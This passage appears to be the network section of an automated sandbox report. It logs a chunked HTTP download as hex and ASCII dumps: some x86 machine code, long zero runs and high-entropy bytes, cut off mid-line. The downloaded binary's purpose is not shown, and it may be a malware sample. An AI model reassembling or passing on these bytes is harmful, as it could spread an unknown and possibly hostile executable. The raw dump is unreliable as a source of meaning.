2023-01-08 15:15:31 UTC	56	IN	Data Raw: 31 66 66 38 0d 0a 06 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 4f 08 8b 77 04 89 71 04 8b 77 08 8b 4f 04 89 71 08 8b 75 10 03 75 fc 89 75 10 c1 fe 04 4e 83 fe 3f 76 03 6a 3f 5e 8b 4d f4 8d 0c f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0 bf 00 00 00 80 d3 ef 8b 4d 08 09 79 04 8d 84 90 c4 00 00 00 8d 4e e0 ba 00 00 00 80 d3 ea 09 10 8b 45 10 89 03 89 44 18 fc 33 c0 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 44 fa bd 02 8b 4d 08 6b c0 14 03 05 48 fa bd 02 83 c1 17 83 e1 f0 89 4d f0 c1 f9 04 53 49 83 f9 20 56 57 7d 0b 83 ce ff d3 Data Ascii: 1ff8!uM!Y]OwqwOquuuN?vj?^MyK{YKYK;KuWLML s}uM9DD }uNMyNED3@_^[UDMkHMSI VW}
2023-01-08 15:15:31 UTC	64	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	64	IN	Data Raw: d8 59 48 5d c3 8b ff 55 8b ec 8b 45 08 a3 18 f6 bd 02 a3 1c f6 bd 02 a3 20 f6 bd 02 a3 24 f6 bd 02 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 0c a0 47 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 20 f6 bd 02 e8 18 af ff ff 59 c3 6a 20 68 d0 7c 41 00 e8 45 85 ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4c 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 64 2b c1 75 44 e8 b1 b0 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9 61 01 00 00 be 18 f6 bd 02 a1 18 f6 bd 02 eb 60 ff 77 5c 8b d3 e8 5d ff ff ff 8b f0 83 c6 08 8b 06 eb 5a 8b c3 83 e8 0f 74 3c 83 e8 06 74 2b 48 74 1c e8 a7 79 ff ff c7 00 16 00 00 00 33 c0 50 50 50 50 50 e8 9b 84 ff ff 83 c4 14 eb ae be 20 f6 bd 02 Data Ascii: YH]UE $]UEGV9Ptku;rkM^;s9Pt3]5 Yj h\|AE3}}]LtjY+t"+t+td+uD}ua`w\]Zt<t+Hty3PPPPP
2023-01-08 15:15:31 UTC	72	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	72	IN	Data Raw: 32 30 30 30 0d 0a 0b c1 4e 89 7d d8 89 45 d4 75 d1 39 75 b0 74 05 66 83 4d d4 01 b8 00 80 00 00 8b c8 66 39 4d d4 77 11 8b 4d d4 81 e1 ff ff 01 00 81 f9 00 80 01 00 75 34 83 7d d6 ff 75 2b 83 65 d6 00 83 7d da ff 75 1c 83 65 da 00 b9 ff ff 00 00 66 39 4d de 75 07 66 89 45 de 42 eb 0e 66 ff 45 de eb 08 ff 45 da eb 03 ff 45 d6 b8 ff 7f 00 00 66 3b d0 72 23 33 c0 33 c9 66 39 45 90 89 45 c8 0f 94 c1 89 45 c4 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d cc eb 3b 66 8b 45 d6 0b 55 90 66 89 45 c4 8b 45 d8 89 45 c6 8b 45 dc 89 45 ca 66 89 55 ce eb 1e 33 c0 66 85 f6 0f 94 c0 83 65 c8 00 48 25 00 00 00 80 05 00 80 ff 7f 83 65 c4 00 89 45 cc 83 7d ac 00 0f 85 3c fd ff ff 8b 45 cc 0f b7 4d c4 8b 75 c6 8b 55 ca c1 e8 10 eb 2f c7 45 94 04 00 00 00 eb 1e 33 f6 b8 ff 7f Data Ascii: 2000N}Eu9utfMf9MwMu4}u+e}uef9MufEBfEEEf;r#33f9EEEIM;fEUfEEEEEfU3feH%eE}<EMuU/E3
2023-01-08 15:15:31 UTC	80	IN	Data Raw: 0d 74 0f 66 89 0b Data Ascii: tf
2023-01-08 15:15:31 UTC	80	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	80	IN	Data Raw: 32 30 30 30 0d 0a 43 43 40 40 89 45 10 e9 b4 00 00 00 8b 4d f0 83 c1 fe 3b c1 73 1e 8d 48 02 66 83 39 0a 75 0d 83 c0 04 89 45 10 6a 0a e9 8e 00 00 00 89 4d 10 e9 84 00 00 00 83 45 10 02 6a 00 8d 45 e8 50 6a 02 8d 45 f8 50 8b 07 ff 34 06 ff 15 b8 11 40 00 85 c0 75 0a ff 15 c4 10 40 00 85 c0 75 5b 83 7d e8 00 74 55 8b 07 f6 44 06 04 48 74 28 66 83 7d f8 0a 74 b2 6a 0d 58 66 89 03 8b 07 8a 4d f8 88 4c 06 05 8b 07 8a 4d f9 88 4c 06 25 8b 07 c6 44 06 26 0a eb 2a 3b 5d f4 75 07 66 83 7d f8 0a 74 85 6a 01 6a ff 6a fe ff 75 08 e8 5b a7 ff ff 83 c4 10 66 83 7d f8 0a 74 08 6a 0d 58 66 89 03 43 43 8b 45 f0 39 45 10 0f 82 1b ff ff ff eb 18 8b 0f 8d 74 0e 04 f6 06 40 75 05 80 0e 02 eb 08 66 8b 00 66 89 03 43 43 2b 5d f4 89 5d f0 e9 91 fe ff ff ff 15 c4 10 40 00 6a 05 Data Ascii: 2000CC@@EM;sHf9uEjMEjEPjEP4@u@u[}tUDHt(f}tjXfMLML%D&*;]uf}tjjju[f}tjXfCCE9Et@uffCC+]]@j
2023-01-08 15:15:31 UTC	88	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	88	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	88	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-01-08 15:15:31 UTC	96	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	96	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	96	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-01-08 15:15:31 UTC	104	IN	Data Raw: 2b 00 07 62 e9 a8 Data Ascii: +b
2023-01-08 15:15:31 UTC	104	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	104	IN	Data Raw: 32 30 30 30 0d 0a 9f 5c 65 45 1e 83 65 85 4b 1c 1f 5d 8b d8 1e c7 54 19 82 bb 34 32 f1 4f a5 95 53 b6 06 69 c0 34 d8 4e 3f e7 4e 14 4a 25 bf d0 5b d1 83 b8 6d 51 b5 02 96 4f bc 01 72 2d e3 61 89 31 87 b9 3f 40 e6 53 02 fa 8e 4a 88 60 8b 79 3b df 5f 05 d9 fe ec ec 0a 9c d7 a6 57 f8 37 ad e7 78 6f b9 9c ea 30 e7 f4 bf b9 59 bf 75 ec f9 12 56 e1 52 89 46 10 97 d9 85 75 e9 6e ef 19 44 10 4a 80 8c 90 37 01 94 e2 d4 bd ab b1 ef cf ba 69 64 63 35 89 87 85 af 01 2c b6 63 13 b2 23 9a 50 af a4 78 9d f9 bd c6 a4 70 c0 13 5f 5a c7 e5 48 51 91 57 39 a1 7e 1b 96 f4 58 43 b3 54 d7 5d f7 b6 50 96 1b 7f 42 6c 05 2e f1 2e 3a e4 d5 0a 64 6e 4d 38 b6 a7 53 fd e5 c2 fd 8f ad 88 d6 8f 63 d7 06 3d ea 54 3b f4 f7 ae 3e b9 f4 24 b5 10 99 b0 6a ec 95 f4 d8 d5 f4 a6 7a 90 30 c5 4b Data Ascii: 2000\eEeK]T42OSi4N?NJ%[mQOr-a1?@SJ`y;_W7xo0YuVRFunDJ7idc5,c#Pxp_ZHQW9~XCT]PBl..:dnM8Sc=T;>$jz0K
2023-01-08 15:15:31 UTC	112	IN	Data Raw: 1c 14 c8 ca b8 02 Data Ascii:
2023-01-08 15:15:31 UTC	112	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	112	IN	Data Raw: 32 30 30 30 0d 0a 6c 91 4b 9d 53 67 07 27 b1 13 9f 7e d5 94 29 c3 e5 84 90 61 34 0e cb 75 d7 ac 2a 83 41 97 22 6e 17 9e 55 c8 0c da a1 57 63 79 ed c0 ef 30 f0 16 13 57 82 6e f1 bf d4 92 74 ef 20 5a 5c bb 10 63 cf d5 27 6c 39 21 ec 79 dc 56 56 13 5e dd c2 94 33 1f 6f 6b 1e 5c aa ad 78 d3 21 94 c0 a0 0b 42 f7 ef 48 7d 01 fa 06 65 ec ba cb aa 28 22 6f 13 1e a5 8a 83 d6 6f d6 27 d4 a3 98 3e 3e 5a ed 9b cc 33 71 d7 54 e8 b8 6f 34 bb ec a6 2d cf 35 d3 d5 ce ed e0 ea 6b 37 cc 6b 80 f4 2f fb 41 03 3e ce f3 34 7d 32 13 8c 63 70 07 2f 64 32 63 c7 c8 43 75 18 e3 82 fc ed 6f e0 0c 5c 2c 32 6b 17 68 27 b8 87 f8 dd c4 01 f9 21 05 a4 ac 5a 7e 28 3f 0d c0 c1 56 1c 86 ae 52 40 0d a5 5f d9 fb 62 d3 3f 0e a9 6f 76 43 d2 81 7c b0 03 37 79 26 33 63 72 8c 07 50 c5 de e5 4d ad Data Ascii: 2000lKSg'~)a4u*A"nUWcy0Wnt Z\c'l9!yVV^3ok\x!BH}e("oo'>>Z3qTo4-5k7k/A>4}2cp/d2cCuo\,2kh'!Z~(?VR@_b?ovC\|7y&3crPM
2023-01-08 15:15:31 UTC	120	IN	Data Raw: 0a 95 fb e8 31 0a Data Ascii: 1
2023-01-08 15:15:31 UTC	120	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	120	IN	Data Raw: 31 66 66 38 0d 0a 66 08 c5 46 08 fd 50 e1 b5 b3 f4 89 ce 80 ea 7d f0 6b 7a 63 ca 0b ae 70 93 e2 a7 41 3c 81 f4 6d 74 57 f9 21 e7 a2 18 5a 21 c2 e1 b4 04 06 d6 32 6b b0 0b 90 ed 94 d1 8d 89 c3 b5 32 d4 31 84 6f 70 7b e2 42 50 27 f0 a8 c3 d0 36 3b f2 59 33 ea 76 ce 3b 44 68 ea f7 2f 26 30 08 52 e1 43 32 da 2d 53 ce e1 34 27 42 b9 2c af 3f 91 73 0c ba 31 22 d4 86 d8 61 54 62 f0 17 c4 25 70 b1 48 58 d3 ba 95 7f d4 3a 4c da ea 61 2c 50 e4 b7 d4 89 c8 5e 69 2a 90 de 4d bd ae 6d dd 4f 22 dd dc 6a fe 66 33 02 a4 d8 e8 1a 5d d9 3a f7 5f f4 ee fe cf 15 74 b7 90 cb 9e 28 84 53 b4 f2 3a 6f fa 34 12 f8 34 72 2c 21 4c bb 3f 79 7e d9 2c f9 52 34 b6 3f 3b 20 dc cf 6d 54 6b bf 5f 30 47 94 9d 62 b6 38 f3 12 8d e1 52 68 17 f6 1f 90 42 57 2e be 74 dd 55 d4 87 a3 02 d0 bf eb Data Ascii: 1ff8fFP}kzcpA<mtW!Z!2k21op{BP'6;Y3v;Dh/&0RC2-S4'B,?s1"aTb%pHX:La,P^i*MmO"jf3]:_t(S:o44r,!L?y~,R4?; mTk_0Gb8RhBW.tU
2023-01-08 15:15:31 UTC	128	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	128	IN	Data Raw: 2b 32 3a a8 ab ff ad ab 13 7c ec 92 00 82 ad 66 5d b9 9f 2a f3 89 39 ca 81 f9 86 85 e7 bc ef 4c 2f a4 15 64 7f 7d 00 1e 99 58 d7 95 a0 5e 07 ad cc 3f 4c 62 f0 e3 13 80 ab fc 36 b8 e5 f6 f3 cd 25 da 1c 6a 42 31 dd 75 ff 4b 01 b8 3b 63 06 b1 f6 ac c4 5c a6 8d a8 8a 0a ea 88 dd 68 9a cd 48 e1 51 5f cc 22 05 7e 61 a6 ab 4f 8e a8 30 5e 6b af 04 ba fc da e0 d5 69 8d 72 f0 a4 0e 15 0b 36 9c ee 43 d9 a5 d5 5e 9c 21 0b 60 46 1b 74 c6 d3 db a6 da 52 3a 57 5e a2 48 1e cb ce 34 c3 9c fd 32 d6 52 44 bd ea d9 0e 1c b7 87 68 ba 77 ff f0 e3 1c 7e 10 55 c2 54 13 d6 f8 fe 78 63 a2 cc 00 a2 55 bf 8b 5a 7f aa d0 e4 4c c7 f6 c1 37 6e fd b0 11 c9 f4 ae b2 ba 9a f6 bd d2 67 a4 1d 49 5d ff 04 ea 11 7c fe 86 75 72 d7 16 49 54 91 f9 69 23 2c 1c a4 ee 27 57 22 99 ad c8 fa 8b df 43 Data Ascii: +2:\|f]*9L/d}X^?Lb6%jB1uK;c\hHQ_"~aO0^kir6C^!`FtR:W^H42RDhw~UTxcUZL7ngI]\|urITi#,'W"C
2023-01-08 15:15:31 UTC	136	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	136	IN	Data Raw: 32 30 30 30 0d 0a eb 21 9b 15 8a 79 7d 0f c3 52 eb 6d b2 25 6f 87 39 c2 7a e1 ac f5 ca 92 b1 7c 9b a1 08 5a 41 15 13 ee 99 07 d9 e8 e3 47 de 10 82 ca f9 1c 41 89 7f a4 2d 76 9d 82 ef 07 58 6f 66 48 61 6a fa 29 a2 1b 18 c2 b5 c6 1f 26 ac 8f 2d 3c 44 14 d4 8f 15 04 19 38 f9 d3 23 73 5e c1 d1 20 f7 c2 eb 53 88 49 49 f9 87 ac 90 e2 33 2a 69 8e 70 07 8c ab b1 41 4d 0e 89 97 e5 fb 24 17 e9 ee e4 07 76 e8 07 b2 81 41 2a c4 a9 66 34 83 98 c8 5c c2 9b 8c 66 49 22 34 f1 ac b6 26 93 02 b1 34 c3 8b 84 f6 72 a3 42 32 0f c5 95 3a 5c f6 4b ca 50 0b 9f 67 fb 57 c5 28 48 44 b1 48 09 3b 10 b1 e2 a7 df 29 b6 66 8d 54 be 48 0d 5e 08 c9 89 29 71 cc 4c 3e 28 04 61 d2 a1 c1 82 35 64 80 8e 43 00 56 f6 ed bb 8a 89 12 36 2e 20 16 77 d3 5f ab 8a ac 17 25 e8 85 a0 de ca 22 70 57 7b Data Ascii: 2000!y}Rm%o9z\|ZAGA-vXofHaj)&-<D8#s^ SII3ipAM$vAf4\fI"4&4rB2:\KPgW(HDH;)fTH^)qL>(a5dCV6. w_%"pW{
2023-01-08 15:15:31 UTC	144	IN	Data Raw: 64 26 d2 e4 48 2c Data Ascii: d&H,
2023-01-08 15:15:31 UTC	144	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	144	IN	Data Raw: 32 30 30 30 0d 0a de c5 94 51 f6 50 7d e5 1c fe 57 0e 3e ad bb ce da 3e e1 6b c5 0b 48 57 0e f0 0f 38 21 06 29 a3 d1 46 84 d6 7f bf 69 35 e0 fc 78 d8 d7 25 d2 a2 88 96 83 dd 1b 7b 48 8b cc 90 03 5a 7c 99 50 0d 64 ab 74 58 1e 17 09 d6 47 fa 4e 12 51 34 6d c1 7f 2f 1c e7 4b 17 d4 05 3b c3 ca 44 1c 84 cd 7d 8b f3 aa e6 2d 0e 0d 48 97 4f 61 33 fc 2d 13 65 0a 6e 31 c0 ed 60 be fa 2b b6 ec ab b6 e2 02 ee a4 ea b6 e2 e7 9d 8c db 41 f3 66 e5 9d 23 65 e8 8f c4 ae 3c 54 c9 6f 04 8b 0e 9d 7f 06 54 c1 be 4a 1f 42 bc 99 94 9d e8 76 7c ba a5 d8 e9 f0 2a e3 f3 a0 f8 6d a9 a0 c6 7d 0f 3e 8f af e1 4d c5 8a f9 09 91 0f 2c 67 72 47 f2 cb 42 9f 1a c1 af e6 33 9f 04 bf 11 87 61 d6 29 f8 e8 c4 8f 00 80 b0 86 c1 92 fa 88 d3 f5 de 7e c4 a2 04 2d e4 91 c1 90 54 f8 8f b8 ff c6 22 Data Ascii: 2000QP}W>>kHW8!)Fi5x%{HZ\|PdtXGNQ4m/K;D}-HOa3-en1`+Af#e<ToTJBv\|*m}>M,grGB3a)~-T"
2023-01-08 15:15:31 UTC	152	IN	Data Raw: 98 30 ed 73 aa da Data Ascii: 0s
2023-01-08 15:15:31 UTC	152	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	152	IN	Data Raw: 32 30 30 30 0d 0a 48 63 df 33 3a 71 6f 14 fc 5c f7 26 0c 2f 30 6d 36 0d 83 b3 5c dd c4 8e 02 64 aa 7c 5f f4 f7 9d e0 12 3e d4 e0 b5 3b 3c 18 3f 6f 00 9b 06 2c e2 66 dd 86 39 dc a6 1b 70 ea f0 f7 03 f1 bc d6 b8 4b 9e 28 a9 47 81 2d 32 e9 b8 9d 4d c4 c6 55 2a 01 9d 27 2d 85 c5 53 b4 cf fb d0 c9 94 9f dc 29 44 9e 03 27 ba 0f 2f 2c 28 83 bb 92 ad 37 da d1 f4 41 4c c8 f8 49 31 19 46 08 90 eb 6a 3b e3 cd 73 ea 20 d7 bb 7f d3 77 dd b5 6a cb 15 99 d1 3c bc 26 59 2a 37 f6 3b 84 35 e2 ce e3 3c 0b a8 25 bc d4 2c 9c 1a d6 e8 1c dc 3d f6 bb ef ed b7 68 b4 1a a5 b6 ca 01 58 8b 33 b0 38 b2 0d c7 02 6d 59 9f aa 89 c0 01 e2 18 df a7 b1 db 50 ce 9b 2b db cc 4d 69 30 36 c1 70 71 b6 14 a3 c7 59 35 4d 77 76 e9 df ef 03 a4 24 23 1b ed fd d9 3f 41 01 a3 ca 87 68 e9 ff 25 6b 7f Data Ascii: 2000Hc3:qo\&/0m6\d\|_>;<?o,f9pK(G-2MU'-S)D'/,(7ALI1Fj;s wj<&Y7;5<%,=hX38mYP+Mi06pqY5Mwv$#?Ah%k
2023-01-08 15:15:31 UTC	160	IN	Data Raw: 21 4e 9d 60 65 5e Data Ascii: !N`e^
2023-01-08 15:15:31 UTC	160	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	160	IN	Data Raw: 32 30 30 30 0d 0a ed 06 b4 f6 19 44 1a 3b 07 7c 45 73 fb 28 18 a1 6b c0 06 cb e4 6d ca 28 ae d5 e5 3a 18 a5 fe 02 17 9c 23 c7 ed 4f 7d 40 92 ec 88 42 c1 e0 5f 2b ce 0b c6 1e aa 0e 64 e6 c8 10 50 4d f6 ef 6e e6 5b 05 2f 9b 44 0d 81 20 74 7e 0b 7c c0 dd aa 08 38 05 0c ed d9 8d 97 7d 3d 40 2b ef d9 9d 53 0f a3 20 ad 4f 9e 0d f0 d4 11 e5 26 c3 90 ad 12 5a 9a cf e4 c1 83 b1 fd 00 50 91 36 ac 00 b5 e0 7a 56 80 1a ae 87 4d 6b 36 71 76 8d df 7b 15 1d f7 bd c4 2c 2a 48 bf 3c ff 0e fd 2b 1a 99 b7 98 16 eb 84 5d f5 a7 fe dd 35 4c dc 54 76 af 40 57 b1 95 87 83 04 11 ca c8 d0 dd ea 76 d8 0d 5c 05 b7 28 40 28 e0 ee 7e 1d 40 d3 c9 3f dc 4a 39 01 86 04 27 1d f0 90 59 d3 a9 f4 6b a4 ed b7 bd dd 4c ea 87 ef 15 00 1d f9 06 05 48 01 8a ab 1f bc 2b e7 7e 9e 94 de ef 38 b4 42 Data Ascii: 2000D;\|Es(km(:#O}@B_+dPMn[/D t~\|8}=@+S O&ZP6zVMk6qv{,*H<+]5LTv@Wv\(@(~@?J9'YkLH+~8B
2023-01-08 15:15:31 UTC	168	IN	Data Raw: d2 1a 5a fc 7c b0 Data Ascii: Z\|
2023-01-08 15:15:31 UTC	168	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	168	IN	Data Raw: 32 30 30 30 0d 0a bf 8d 3a 09 ed ed af 1e 5e bf 93 07 b6 b3 60 d6 91 50 ec b3 73 0a e5 a3 db da 4b a9 16 5e b0 a0 13 7c b6 42 d0 22 12 ee f8 0d c6 27 7a d6 de 2c ac 7a ea 5d 99 9f 17 ab 49 f9 fc e6 7a 23 31 93 f3 58 cd 69 60 72 de d0 6e a9 10 0e 65 d4 a9 80 62 74 af e8 ac c4 f8 73 bf 5f 04 e8 3e e6 1e 01 8e d8 94 7a 85 bb dd cb 6a 42 42 b6 f1 a7 dd 99 d9 0d 52 7b 8b 44 2d 34 6e 7f 0e 67 f5 59 78 4d 7a 12 f2 37 47 6c ac 5a 6e d0 0e af 34 41 8e d5 ca 7f 40 b8 c5 a4 c9 32 f7 95 f5 b4 8e 86 d0 c4 3b ba 6c 45 25 7c e5 18 37 f8 45 6a e7 57 67 ce 28 90 f9 dc c2 e4 81 b7 fa 12 af 2b be cd fa 42 45 a1 7a eb 4a c6 89 b0 3c c1 dd 58 9e 6c aa 0b d0 ad 3e 5a d5 24 06 e0 83 48 a3 30 13 5e 41 8b 61 7c c9 e1 74 44 dc f2 38 15 8a a8 d5 a6 0e a5 50 5c e8 6b 65 77 db 6f a1 Data Ascii: 2000:^`PsK^\|B"'z,z]Iz#1Xi`rnebts_>zjBBR{D-4ngYxMz7GlZn4A@2;lE%\|7EjWg(+BEzJ<Xl>Z$H0^Aa\|tD8P\kewo
2023-01-08 15:15:31 UTC	176	IN	Data Raw: 96 8c 12 bb b6 5f Data Ascii: _
2023-01-08 15:15:31 UTC	176	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	176	IN	Data Raw: 32 30 30 30 0d 0a 22 3a d5 fa bc 24 4d 9b 3b e1 db 1f 4c 16 ab ce 26 da 68 87 a8 df 89 f9 35 32 36 72 cc 74 6a 20 39 4f ff 22 4f 2e 50 06 83 5f 2f 6f bd 28 0b cc 8f c2 63 c3 69 4a ee 92 7b 50 75 df 10 98 50 ad 13 e0 46 e1 4c 67 f1 5b 54 dd 77 ea a9 3c 3a 19 74 b8 2e a9 ac cf 64 2f 25 f9 f8 7a 59 fd b1 a8 ef e5 a2 91 c4 a5 48 c7 6c 4b 58 9e ff 76 39 a0 6a ee 45 89 fe 1a e0 88 fb 45 0d b0 7f 93 d2 6f 77 90 dc 01 0e be d5 93 a6 1b 44 c2 1c b0 e8 2a 45 ca 6b 3a 8f 69 a2 7d 54 ba 21 cb 43 57 c4 0f e3 ab 36 f7 e3 8c 1d a7 8a 4b aa bf 64 5e a8 14 81 5a b5 6d 76 59 87 91 a9 d7 46 65 54 46 76 9d 41 4c 92 30 46 c0 34 e4 ed e0 48 e2 8b 02 2a 6e 4f 60 b9 41 b8 1e d6 86 a2 b5 1d 38 65 7a b0 a0 09 6d c3 e2 31 55 ec a3 9f d0 98 6c 80 a2 da 7e fa f0 03 de 6c 59 52 c4 41 Data Ascii: 2000":$M;L&h526rtj 9O"O.P_/o(ciJ{PuPFLg[Tw<:t.d/%zYHlKXv9jEEowDEk:i}T!CW6Kd^ZmvYFeTFvAL0F4HnO`A8ezm1Ul~lYRA
2023-01-08 15:15:31 UTC	184	IN	Data Raw: c6 d6 32 41 bd 3b Data Ascii: 2A;
2023-01-08 15:15:31 UTC	184	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	184	IN	Data Raw: 31 66 66 38 0d 0a 50 73 5d a6 6e ec 5f 91 fe f7 55 0d 0a da 05 c8 c2 4a 1a f2 c3 b7 ea d8 23 3d d1 71 11 08 48 61 8b 5c 7c 6a 80 35 1d cb 08 e3 ea 78 35 a1 46 99 73 0d 78 56 10 0c 4f 61 f2 6d d6 4f 17 89 28 fa d5 3d 1d 44 68 b9 ad 9a f9 89 83 0c 41 71 88 6a d1 3d ba a7 98 6c a5 91 e6 c7 ee 43 5d 08 c1 49 ee ae 1e 9c a7 ea c4 f8 65 10 a9 e9 7e 88 84 65 83 43 71 be c8 db 22 27 df 2e 28 bd d2 62 64 9b bd f9 a4 31 53 bb 15 48 a2 1e d0 22 83 b8 11 c2 f8 aa fc a6 f1 60 a3 34 b7 be 58 48 f4 a5 90 14 3c c5 99 9c 2d bb f2 36 18 30 db e5 2c 5c 25 29 60 6b 90 e9 02 e7 22 b0 8f 45 12 10 71 40 3f 48 ad 6e 28 d9 49 11 44 39 74 c3 30 6a b1 e9 d9 2b a2 ad f4 7d 85 01 5d 49 4e 36 5f aa fb 51 cc 00 c8 bf 28 d2 e8 5c 1c 66 77 13 5d 50 78 b8 d8 27 1d 1f be bc 21 71 1d 77 de Data Ascii: 1ff8Ps]n_UJ#=qHa\\|j5x5FsxVOamO(=DhAqj=lC]Ie~eCq"'.(bd1SH"`4XH<-60,\%)`k"Eq@?Hn(ID9t0j+}]IN6_Q(\fw]Px'!qw
2023-01-08 15:15:31 UTC	192	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	192	IN	Data Raw: c9 61 92 bf ef 12 25 8c 15 c1 3a 57 18 63 86 42 9c 1b 6a 4b e5 38 c7 83 da f3 ee 0b 1d 0e 29 20 8a b5 42 23 51 da c3 5a 45 2e fd 20 42 16 6f af b8 a8 d9 95 33 66 d0 66 64 1e ac fa 4f bf 33 c4 88 be 44 e0 b1 94 dd 11 bd 8c eb f4 fd 52 18 e5 e8 b8 ad 11 aa 52 5a 55 94 5d 5e c9 7a 70 ac 8b 5d 5f 83 3a 53 a6 d3 59 72 1d 30 eb a4 d4 84 85 ac 9a ea 0f 5d 13 d3 02 1c aa 0f d6 3a 05 90 31 af f2 7d d7 a2 31 91 e8 e8 33 4b ef 37 67 6a 29 2d e3 60 ac 14 43 71 d3 c6 ae 2f c0 d1 0b 27 ae 51 ba 9f 48 5a fa c9 5f da 85 1a 19 92 60 fd cd 4d 20 52 39 f6 be fb ea dc 03 00 59 d6 dd db 31 e2 ba 54 50 7e 04 d1 e5 48 b8 4a e5 1b a1 80 c0 46 32 db b5 8c 52 17 26 a7 0a 8f 1d 66 76 25 86 bf 72 5f 7b fc 35 99 e1 bd a7 ea 3a bb 7b 89 9d 65 a4 aa 6e 41 c4 60 13 9a cf e0 e4 e6 39 13 Data Ascii: a%:WcBjK8) B#QZE. Bo3ffdO3DRRZU]^zp]_:SYr0]:1}13K7gj)-`Cq/'QHZ_`M R9Y1TP~HJF2R&fv%r_{5:{enA`9
2023-01-08 15:15:31 UTC	200	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	200	IN	Data Raw: 32 30 30 30 0d 0a aa a7 40 4c 47 cb 26 09 09 19 b1 a9 5e 27 47 23 9b 28 cb b3 b5 51 25 87 ae ff 23 a3 a7 c2 21 d4 65 1d 1e 8d 8f 86 34 dd 4f 93 9b e6 57 ce 30 b9 af 12 8b 92 7b 6f cd c3 a2 79 0c df 50 ab f7 0f 3d 44 2a b0 a8 2b 0f 37 32 84 d4 87 9f d9 f9 72 6f 17 d2 d1 2b 78 b4 98 4f fd 08 c0 b6 cc e8 50 ab 48 60 0b c5 80 df ae e9 d7 ba 07 b3 93 b5 20 14 b0 ec 69 90 5f 04 6e bf 61 50 7d 65 f4 4e 21 30 e4 46 ce d3 26 60 6f c1 32 ff fa cd ff 88 55 f7 45 cb 23 46 e8 aa 5a f9 aa 7e 6d 47 31 bf 97 d9 5b df cb 40 0b 74 ec c1 33 a4 91 4a 09 b8 90 e9 1e c6 bd 08 d5 b1 c1 c6 11 20 75 a8 